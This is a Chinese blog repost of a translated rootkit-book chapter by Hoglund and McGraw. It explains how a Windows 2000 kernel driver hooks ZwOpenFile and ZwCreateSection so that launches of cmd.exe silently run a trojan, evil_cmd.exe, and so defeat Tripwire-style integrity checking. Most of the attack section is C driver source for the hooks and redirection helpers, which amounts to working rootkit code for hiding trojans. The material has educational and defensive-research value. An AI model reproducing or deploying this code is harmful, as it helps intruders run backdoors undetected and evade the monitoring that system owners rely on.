特洛伊执行体重定向

最新推荐文章于 2021-08-02 17:55:39 发布
最新推荐文章于 2021-08-02 17:55:39 发布
阅读量645 收藏
点赞数
分类专栏: 病毒汇编和调试逆向技术加脱壳 文章标签: attributes hook file integer string null
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iiprogram/article/details/2298840
版权
 作者:Greg Hoglund, Gary McGraw
翻译:Rhett
//--------------------------------------------------------------

  一旦入侵者拿到系统的root权限,所有监视和审核系统的效能都会大打折扣,甚至是在硬件层面的数据审核和加密校验措施也能被挫败。唯一例外的是被隔离存放的审核和校验系统所在的硬件设备。这个当然是废话。最邻近的系统会被隔离,管理员拿出硬盘在另外的系统上运行完整性检查程序。实际上,这是使用Tripwire安全程序的唯一方法。(Tripwire是流行的,但却有着致命缺陷的完整性检查程序)

  执行体重定向和Tripwire的问题

  这章我们演示的系统调用hook能在系统下隐藏一些事实。当你替换一个文件或者在原来的地方去执行一个木马文件时会发生什么。系统调用钩子能改变系统调用的逻辑并提供一些附加功能,后门,甚至改变请求的目标。拿Tripwire这样普遍的监视后门木马的程序来说。Tripwire程序读取系统每个文件的内容并根据内容数据生成一个加密hash。当文件内容被改变时会生成新的hash值。这就是说当下次管理员用Tripwire进行检查时会发现新的hash值。理论上这是个好方法,但实际上是根本没用的。

  让我们来看看当黑客在目标系统上安装了内核级rootkit后会发生些什么。这个例子将说明黒客如何用木马文件替换原始版本的文件。黒客会挫败Tripwire以使安全管理员不能检测到后门的存在。演示说明用的系统是windows 2000。简单起见,假设入侵者发现了一个借助php脚本,在windows 2000 web 服务器远程执行代码的漏洞。入侵者的首要任务是利用此漏洞在系统上安装一个可执行文件。入侵者编译了一个window2000下的驱动,驱动hook掉了下面两个系统调用:

 ZwOpenFile

 ZwCreateSection

  安装驱动来hook这两个系统调用,并且在启动的时候打开木马文件,拿到木马文件句柄。在我们的例子里,我们将把命令解释程序cmd.exe替换为我们的木马文件evil_cmd.exe。当一个应用程序或管理员自己加载cmd.exe的时候,我们的evil_cmd.exe将能把它替换掉。不幸的是,使用Tripwire并不能发觉到替换的动作。

  在编译和测试完毕后,将驱动文件和evil_cmd.exe传送到目标系统上,然后把驱动用一般的方法加载到内存中。

  实现重定向的驱动:

实现重定向的驱动用感染程序执行机制(不是程序本身)的方式使得Tripwire失效。驱动并不替换原来的文件。像Tripwire这样的程序将始终是看到正确的数据,因为确实是在打开正确,没修改的文件。我们对ZwOpenFile的hook检查每个打开的文件,并简单的跟踪文件句柄。当驱动发现有对目标文件的请求时,则更改要使用的文件句柄。驱动这时把原来的文件句柄用木马文件的句柄进行替换。这样只影响新进程的创建但并不会影响磁盘上的文件。Tripwire在这时候显得及其蠢笨。

 NTSTATUS NewZwOpenFile(
    PHANDLE phFile,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    PIO_STATUS_BLOCK pIoStatusBlock,
    ULONG ShareMode,
    ULONG OpenMode
)
{
        int rc;
        CHAR aProcessName[PROCNAMELEN];

        GetProcessName( aProcessName );
        DbgPrint("rootkit: NewZwOpenFile() from %s/n", aProcessName);

        DumpObjectAttributes(ObjectAttributes);

        rc=((ZWOPENFILE)(OldZwOpenFile)) (
                        phFile,
                        DesiredAccess,
                        ObjectAttributes,
                        pIoStatusBlock,
                        ShareMode,
                        OpenMode);
        if(*phFile)
        {
            DbgPrint("rootkit: file handle is 0x%X/n", *phFile);
            /* ___________________________________________________
             . TESTING ONLY
             . If name starts w/ cmd.exe lets redirect to a Trojan
             . ___________________________________________________ */
            if( !wcsncmp(
                        ObjectAttributes->ObjectName->Buffer,
                        L"//??//C://WINNT//SYSTEM32//cmd.exe",
                        29))
            {
                WatchProcessHandle(*phFile);
            }
        }

        DbgPrint("rootkit: ZwOpenFile : rc = %x/n", rc);
        return rc;
}

  对ZwOpenFile的hook可以通过检查打开文件的文件名判断是不是我们感兴趣的文件。如果是的话,把文件句柄保存下来以后使用。我们自定义的hook函数只是简单的调用原始的ZwOpenFile函数,并使执行继续。

   如果是试图用文件句柄创建进程的话,我们的代码将重定向到我们的木马文件。在进程创建之前,先要分配一个块的内存。一个块的内存类似于NT内核的内存映射文件。创建内存块时要用到文件句柄。建立起内存和文件的映射,然后可以调用 ZwCreateProcess 了。我们的驱动监视所有用目标文件句柄对内存块的创建。如果是目标文件被映射,这就是说将要被执行了。这正是我们替换文件句柄的时候。从而使得我们的木马文件被映射,而不是原来的文件。这样做效果非常好。我们对ZwCreateSection 进行如下的替换:

 NTSTATUS NewZwCreateSection (
          OUT PHANDLE phSection,
          IN ACCESS_MASK DesiredAccess,
          IN POBJECT_ATTRIBUTES ObjectAttributes,
          IN PLARGE_INTEGER MaximumSize OPTIONAL,
          IN ULONG SectionPageProtection,
          IN ULONG AllocationAttributes,
          IN HANDLE hFile OPTIONAL
          )
{
                    int rc;
                    CHAR aProcessName[PROCNAMELEN];

                    GetProcessName( aProcessName );
                    DbgPrint("rootkit: NewZwCreateSection() from %s/n", aProcessName);

                    DumpObjectAttributes(ObjectAttributes);

                    if(AllocationAttributes & SEC_FILE)
                             DbgPrint("AllocationAttributes & SEC_FILE/n");
                    if(AllocationAttributes & SEC_IMAGE)
                             DbgPrint("AllocationAttributes & SEC_IMAGE/n");

                    if(AllocationAttributes & SEC_RESERVE)
                             DbgPrint("AllocationAttributes & SEC_RESERVE/n");
                    if(AllocationAttributes & SEC_COMMIT)
                             DbgPrint("AllocationAttributes & SEC_COMMIT/n");
                    if(AllocationAttributes & SEC_NOCACHE)
                             DbgPrint("AllocationAttributes & SEC_NOCACHE/n");

        DbgPrint("ZwCreateSection hFile == 0x%X/n", hFile);
#if 1
        if(hFile)
        {
            HANDLE newFileH = CheckForRedirectedFile( hFile );
            if(newFileH){
                hFile = newFileH;
            }
        }
#endif
                    rc=((ZWCREATESECTION)(OldZwCreateSection)) (
                         phSection,
                         DesiredAccess,
                         ObjectAttributes,
                         MaximumSize,
                         SectionPageProtection,
                         AllocationAttributes,
                         hFile);
                    if(phSection)
                    {
                             DbgPrint("section handle 0x%X/n", *phSection);
                    }
        DbgPrint("rootkit: ZwCreateSection : rc = %x/n", rc);
        return rc;
}
  木马文件可以用下面的代码映射到内存。以下是上面代码的支持函数。注,这里木马文件是放在C盘根目录下。

HANDLE gFileHandle = 0;
HANDLE gSectionHandle = 0;
HANDLE gRedirectSectionHandle = 0;
HANDLE gRedirectFileHandle = 0;

void WatchProcessHandle( HANDLE theFileH )
{
    NTSTATUS rc;
    HANDLE hProcessCreated, hProcessOpened, hFile, hSection;
    OBJECT_ATTRIBUTES ObjectAttr;
    UNICODE_STRING ProcessName;
    UNICODE_STRING SectionName;
    UNICODE_STRING FileName;
    LARGE_INTEGER MaxSize;
    ULONG SectionSize=8192;

    IO_STATUS_BLOCK ioStatusBlock;
    ULONG allocsize = 0;

    DbgPrint("rootkit: Loading Trojan File Image/n");

    /* first open file w/ NtCreateFile
     . this works for a Win32 image.
     . calc.exe is just for testing.
     */

    RtlInitUnicodeString(&FileName, L"//??//C://evil_cmd.exe");
    InitializeObjectAttributes( &ObjectAttr,
                                &FileName,
                                OBJ_CASE_INSENSITIVE,
                                NULL,
                                NULL);

    rc = ZwCreateFile(
             &hFile,
             GENERIC_READ | GENERIC_EXECUTE,
             &ObjectAttr,
             &ioStatusBlock,
             &allocsize,
             FILE_ATTRIBUTE_NORMAL,
             FILE_SHARE_READ,
             FILE_OPEN,
             0,
             NULL,
             0);
    if (rc!=STATUS_SUCCESS) {
             DbgPrint("Unable to open file, rc=%x/n", rc);
             return 0;
    }
    SetTrojanRedirectFile( hFile );
    gFileHandle = theFileH;
}

HANDLE CheckForRedirectedFile( HANDLE hFile )
{
    if(hFile == gFileHandle)
    {
             DbgPrint("rootkit: Found redirected filehandle - from %x to %x/n", hFile,

 gRedirectFileHandle);
             return gRedirectFileHandle;
    }
    return NULL;
}
void SetTrojanRedirectFile( HANDLE hFile )
{
    gRedirectFileHandle = hFile;
}

 
iiprogram
关注
专栏目录
执行进程--EPROCESS
BpLife
12-08 1384
执行层位于内核层之上,它侧重于提供各种管理策略,同时为上层应用层程序提供基本的功能接口。 // Process structure. // // If you remove a field from this structure, please also // remove the reference to it from within the kernel debugger // (nt\p
执行重定向
05-10 1730
题目:特洛伊执行重定向作者:Greg Hoglund, Gary McGraw翻译:Rhett//--------------------------------------------------------------一旦入侵者拿到系统的root权限,所有监视和审核系统的效能都会大打折扣,甚至是在硬件层面的数据审核和加密校验措施也能被挫败。唯一例外的是被隔离存放的审核和校验系统所在的硬件设备
windows内核开发学习笔记二十八:内核的关键组件之执行(Executive)
jyl_sh的专栏
06-25 1162
执行是内核模块的上层部分,在大的方面看,执行包含以下组件: 进程和线程管理器,负责创建进程和线程,以及终止进程和线程。对于进程和线程的底层支持是在内核层中提供的,执行在内核层的基础上又添加了一些语义和功能。 内存管理器。此组件提供了虚拟内存功能,既负责系统地址空间的内存管理,又为每个进程提供了一个私有的地址空间,并且也支持进程间的内存共享。 安全引用监视器,该组件强制在本地计算机上实施安全策略,守护操作系统的资源,执行对象的保护和审计。 I/O管理器。实现与设备无关的输入和输出功能,负责将I/
PE详解(windows 可移植的执行)
06-06
PE 的意思就是 Portable Executable(可移植的执行)。它是 Win32环境自身所带的执行文件格式。它的一些特性继承自 Unix的 Coff (common object file format)文件格式。"portable executable"(可移植的执行)意味着此文件格式是跨win32平台的 : 即使Windows运行在非Intel的CPU上,任何win32平台的PE装载器都能识别和使用该文件格式。当然,移植到不同的CPU上PE执行必然得有一些改变。所有 win32执行 (除了VxD和16位的Dll)都使用PE文件格式,包括NT的内核模式驱动程序(kernel mode drivers)。因而研究PE文件格式给了我们洞悉Windows结构的良机。
定义线程的执行的方法
oqiolalala的博客
08-02 6066
以下哪个方法用于定义线程的执行? ( ) A.start() B.init() C.run() D.synchronized() 答案:C start()是线程开始执行 init()是初始化 run()是定义线程内部执行的方法 synchronized()是处理多线程同步用的
FuCE Fuzzing+Concolic执行引导的可综合硬件设计中的特洛伊木马检测_FuCE Fuzzing+Concolic
01-16
标题和描述所提及的“FuCE Fuzzing+Concolic执行引导的可综合硬件设计中的特洛伊木马检测”是一种针对这类威胁的新型检测方法。这篇研究论文聚焦于如何在高级综合(High-level Synthesis,简称HLS)设计中发现这些...
北通特洛伊_BTP-2276手柄驱动 官方版
07-13
北通特洛伊_BTP-2276手柄驱动是一款实用性很强的手柄驱动软件,适配于北通特洛伊_BTP-2276这个型号的手柄,有了这款驱动软件,用户就可以自己设置手柄的呼吸灯颜色,快捷键等,欢迎大家下载。手柄驱动参数:产品型号...
特洛伊木马攻击的量子密钥多播通信协议
03-26
特洛伊木马是一种常见的网络攻击形式,攻击者通过隐藏在看似合法的程序中植入恶意代码,使用户在不知情的情况下执行该程序,从而给系统造成损害。在通信协议中,特洛伊木马攻击可能指攻击者通过嵌入恶意软件或硬件来...
特洛伊木马专杀
01-30
特洛伊木马专杀
执行内存池的管理算法
maomao171314的专栏
12-30 243
执行内存池的管理算法 执行内存池对象数据结构POOL_DESCRIPTOR,定义如下: typedef struct _POOL_DESCRIPTOR { POOL_TYPE PoolType; ULONG PoolIndex; ULONG RunningAllocs; ULONG RunningDeAllocs; ULONG TotalPages; ULONG TotalBigPages; ULONG Threshold; ...
x86 emulator 源码
12-13
模拟器源代码,内有汇编器、反汇编器,实现windows底层操作,ZwCreateSection, ZwCreateFileMapping, OpenProcess等,含有PE结构解析,引入表IAT重构,调试器dbg,还有linux底层相关的源码等等,自己去宝库发掘。 可以作为实现自己的模拟器的参考,也可以用作其他相关项目的源码参考,相当经典,推荐!
ZwOpenFile [WDK翻译]
死胖子的博客
02-03 1816
ZwOpenFile 提供了一个句柄,通过它可以操作一个文件的数据或者是文件状态,或是文件的属性。ZwOpenFile 提供了ZwCreateFile的一个功能子集(ZwCreateFile能做更多事).
进程创建监控
zzmzzff的博客
03-28 714
上次讲了下进程保护原理,这次讲一下进程监控。监视进程创建,也就是监视EXE程序启动,就要hook掉创建进程的API,创建进程的API有ntdll!ZwCreateProcessEx、ZwCreateSection、ZwCreateThread等,kernel32里有CreateProcessA(W)和CreateProcessInternalA(W),hook ZW函数比较麻烦,因为那时进...
磁盘文件操作_ZwCreateFile_ZwOpenFile_ZwReadFile_ZwWriteFile_ZwSetInformationFile_ZwQueryInformationFile
01-27 3186
#include"ntddk.h" VOID xiezai1(PDRIVER_OBJECT qudongduixiang) { KdPrint(("驱动卸载 历程\n")); return; } NTSTATUS DriverEntry(PDRIVER_OBJECT qudongduixiang, PUNICODE_STRING zhucebiao1) { HANDLE wenjianju
Windows驱动开发之文件操作
enjoy5512的博客
07-06 7046
内核态文件操作 内核态字符串操作 内核态动态内存申请/释放
驱动内存映射文件
liwen930723的专栏
09-25 1265
驱动内存映射文件,一切尽在代码中,各位老爷请看:       // 内存映射文件,返回基址 // 用完记得ZwUnmapViewOfSection(ZwCurrentProcess(), BaseAddress); PVOID CreateMapFileAndGetBaseAddr(PUNICODE_STRING FilePath, PSIZE_T Size) { #define SE...
内核模式下的文件操作
crkres9527
09-27 449
A、文件的创建 B、文件的打开 C、获取和修改文件属性 D、写文件和读文件   一、文件的创建 InitializeObjectAttributes 初始化  POBJECT_ATTRIBUTES 结构 ZwCreateFile 二、文件的打开    ZwCreateFile,ZwOpenFile 三、获取和修改文件属性     ZwQueryInformationFile,...
执行线程--ETHREAD
BpLife
12-09 2642
typedef struct _ETHREAD { KTHREAD Tcb;//内嵌了KTHREAD对象作为第一个数据成员 LARGE_INTEGER CreateTime;//包含了线程创建时间,他是在线程创建时被赋值的。 union { LARGE_INTEGER ExitTime;//包含了线程的退出时间, LIST_ENTRY L
特洛伊木马攻击与防护策略研究
"特洛伊木马”(Trojan Horse)是一种恶意软件,源自古希腊神话中的故事,如今在信息技术领域,它指的是那些看似无害但实际上隐藏着恶意功能的程序。不同于传统计算机病毒,特洛伊木马不会自我复制或感染其他文件,但...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值